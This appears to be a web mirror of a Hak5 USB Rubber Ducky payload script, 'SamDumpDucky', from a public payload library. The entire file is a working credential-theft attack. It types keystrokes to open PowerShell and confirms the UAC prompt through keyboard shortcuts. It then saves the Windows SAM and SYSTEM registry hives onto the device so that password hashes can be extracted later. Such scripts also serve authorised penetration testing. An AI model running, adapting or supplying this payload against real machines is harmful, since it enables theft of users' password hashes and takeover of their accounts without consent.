Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/credentials/SamDumpDucky/payload.txt
2968 views
1
REM Title:         SamDumpDucky

2
REM Description:   Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.

3
REM Author:        0i41E

4
REM Version:       2.0

5
REM Category:      Credentials

6
REM Attackmodes:   HID, Storage

7


8
ATTACKMODE HID STORAGE

9


10
REM Extension made by Korben to increase speed

11
EXTENSION DETECT_READY

12
    REM VERSION 1.1

13
    REM AUTHOR: Korben

14


15
    REM_BLOCK DOCUMENTATION

16
        USAGE:

17
            Extension runs inline (here)

18
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

19
            boot delay

20


21
        TARGETS:

22
            Any system that reflects CAPSLOCK will detect minimum required delay

23
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms

24
    END_REM

25


26
    REM CONFIGURATION:

27
    DEFINE #RESPONSE_DELAY 25

28
    DEFINE #ITERATION_LIMIT 120

29


30
    VAR $C = 0

31
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))

32
        CAPSLOCK

33
        DELAY #RESPONSE_DELAY

34
        $C = ($C + 1)

35
    END_WHILE

36
    CAPSLOCK

37
END_EXTENSION

38


39
REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here

40
EXTENSION WINDOWS_ELEVATED_EXECUTION

41
    REM VERSION 1.1

42
    REM Author: 0i41E

43
    REM Executes the desired program with elevated privileges

44
    REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts

45
    REM additional extensions

46


47
    REM CONFIGURATION:

48
    REM Used to wait for the UAC prompt to react to input

49
    DEFINE #INPUT_WAIT 2000

50
    REM Shortcut for YES across multiple languages

51
    DEFINE #ENGLISH_ACCEPT ALT y

52
    DEFINE #GERMAN_ACCEPT ALT j

53
    DEFINE #SPAIN_ACCEPT ALT s

54
 

55
    FUNCTION Elevated_Execution()

56
        DELAY #INPUT_WAIT  

57
        CTRL-SHIFT ENTER

58
        DELAY #INPUT_WAIT

59
        REM Change below for appropriate language

60
        #GERMAN_ACCEPT

61
        DELAY #INPUT_WAIT

62
    END_FUNCTION

63


64
    REM EXAMPLE USAGE AFTER EXTENSION

65
    REM DELAY 2000

66
    REM GUI r

67
    REM DELAY 2000

68
    REM STRING powershell

69
    REM Elevated_Execution()

70
    REM STRINGLN whoami /priv

71


72
END_EXTENSION

73


74
REM Extension by 0i41E, to signalize the successful execution of the payload

75
EXTENSION DETECT_FINISHED

76
    REM VERSION 1.0

77
    REM AUTHOR: 0i41E

78


79
    REM_BLOCK DOCUMENTATION

80
        USAGE:

81
            Use the function Detect_Finished() to signal the finished execution of your payload.

82
    END_REM

83


84
    REM CONFIGURATION:

85
    DEFINE #PAUSE 150

86
    FUNCTION Detect_Finished()

87
        IF ($_CAPSLOCK_ON == FALSE)

88
            CAPSLOCK

89
            DELAY #PAUSE

90
            CAPSLOCK

91
            DELAY #PAUSE

92
            CAPSLOCK

93
            DELAY #PAUSE

94
            CAPSLOCK

95
            ATTACKMODE OFF

96
        ELSE IF

97
            CAPSLOCK

98
            DELAY #PAUSE

99
            CAPSLOCK

100
            DELAY #PAUSE

101
            CAPSLOCK

102
            ATTACKMODE OFF

103
        END_IF

104
    END_FUNCTION

105
END_EXTENSION

106


107
DELAY 1000

108
GUI r

109
DELAY 500

110
STRING powershell -nop -noni

111
REM Opening elevated powershell via extension

112
Elevated_Execution()

113
STRINGLN cd (gwmi win32_volume -f 'label=''DUCKY''').Name

114
DELAY 350

115
REM Dumping Sam&System and saving them onto the ducky. This may take some time, potentially over 2 minutes

116
STRING Write-Host "[+]Exfiltrating Sam&System..." -ForegroundColor Green;reg save hklm\sam DuckySam;Write-Host "[?]This may take a while..." -ForegroundColor Yellow;reg save hklm\system DuckySys;Write-Host "[+]Exfiltration Complete!" -ForegroundColor Green

117
STRINGLN ;(New-Object -comObject Shell.Application).Namespace(17).ParseName((gwmi win32_volume -f 'label=''DUCKY''').Name).InvokeVerb('Eject');(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');ExIt

118
DELAY 250

119
REM Waiting for CAPSLOCK, pressed by Powershell, to proceed with the finishing lines.

120
WAIT_FOR_CAPS_ON

121
DELAY 250

122
Detect_Finished()

123


124